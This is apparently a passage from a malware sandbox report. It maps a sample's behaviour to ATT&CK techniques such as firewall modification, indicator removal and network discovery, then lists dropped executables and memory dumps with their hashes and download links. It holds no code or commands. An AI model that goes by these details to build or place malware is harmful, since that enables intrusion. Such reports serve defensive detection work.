Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Persistence

T1070.009

Credential Access

Discovery

Network Share Discovery

T1135

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\hentai.exe

Filesize
64KB

MD5
33332120861d18fbd17fee1025af56dd

SHA1
132a3a34c2178a1d6ea110e904ba81dfc7765b6f

SHA256
7776bb0e5a62e12498d89cf7f34ef2d1fad3ccef52cbb9d5c62ef492f4e3873d

SHA512
ff9aab8f465d060315e998ec0738998506c065f24c3361777bd5b2c7f0fcbe913eb14a71f1ceae30e986bd68989dbdefe00aed9129347cc9435b0c712941e5b1

Download Submit
C:\Windows\wdabblgz\cksygut.exe

Filesize
10.6MB

MD5
7db048f8fcc691586718fa13f578d683

SHA1
069e198e42d041daa565d10aac000ff609e89558

SHA256
d3dba1c1be7aa809bd4285c3bf99e4a1cbfe33069732cf579c775a70bbac07a8

SHA512
1eae6491871af9017bd5a017bd5d55088fb272da069265a186176aead747cd3d3e46a0fb8613c75a368bdf16da66e61f83dcff41478b8e047e27ac130939fa67

Download Submit
C:\Windows\wdabblgz\yjixppqtbckkefy26792.exe

Filesize
69KB

MD5
e564dc14ddb5b9c5e1661339b1daed09

SHA1
c951eda553db0d816fc79765937112f66976f8d5

SHA256
3d06ca12e9d6e3effe5fcbb87ebd16d4e978b9657374e3d0fb3c81725d415a98

SHA512
37e69238a07ae617aff72719c15b1503e6c2a94c8fbacc4ca28ebd0d083d93815fd66af83147692ea3449256a5c86a1137d763cff6f21617e8ca80eeb4d91d2e

Download Submit
memory/756-38-0x0000000010000000-0x000000001000B000-memory.dmp

Filesize
44KB

Download
memory/1592-0-0x0000000000400000-0x0000000000D0F000-memory.dmp

Filesize
9.1MB

Download
memory/1592-8-0x0000000000400000-0x0000000000D0F000-memory.dmp

Filesize
9.1MB

Download
memory/3644-41-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/3644-46-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/5364-23-0x0000000000400000-0x0000000000D0F000-memory.dmp

Filesize
9.1MB

Download
memory/5444-9-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/5444-19-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download